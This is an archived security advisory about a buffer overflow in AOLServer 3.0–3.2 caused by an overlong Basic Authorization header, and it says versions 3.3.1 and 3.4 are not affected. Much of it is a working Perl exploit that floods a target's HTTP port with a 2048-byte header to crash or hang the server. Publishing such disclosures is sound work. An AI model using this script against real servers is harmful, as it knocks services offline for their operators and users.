AOH :: Unix :: General :: AOL17~1.HTM

AOH :: Unix :: General :: AOL17~1.HTM
AOLServer 3.2 exploitable buffer overflow

COMMAND

    AOLserver

SYSTEMS AFFECTED

    AOLserver 3.0..3.2

PROBLEM

    Nate Haggard found  following.  Aolserver  3.0 will crash  when it
    is given a  long authorization string.   It is also  possible this
    vulnerability  will  allow  a  hacker  to  execute  arbitrary code
    through a buffer overflow.

    Here is a sample exploit:

    #!/usr/bin/perl
    use IO::Socket;
    unless (@ARGV == 1) { die "usage: $0 host ..." }
    $host = shift(@ARGV);
    $remote = IO::Socket::INET->new( Proto     => "tcp",
                                     PeerAddr  => $host,
                                     PeerPort  => "http(80)",
                                     );
    unless ($remote) { die "cannot connect to http daemon on $host" }

    $junk = "X" x 2048;
    $killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n";
    $remote->autoflush(1);
    print $remote $killme;
    close $remote;

    AOLserver 3.2 is also  vulnerable (Red Hat 6.0++,  kernel 2.2.19).
    Btw, above line should be:

        $killme = "GET / HTTP/1.0\r\nAuthorization: Basic ".$junk."\r\n\r\n";

    but it  doesn't matter,  though; it  seems to  make AOLserver hang
    either way.

SOLUTION

    Aolserver 3.4 and 3.3.1 are not vulnerable to this attack.

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.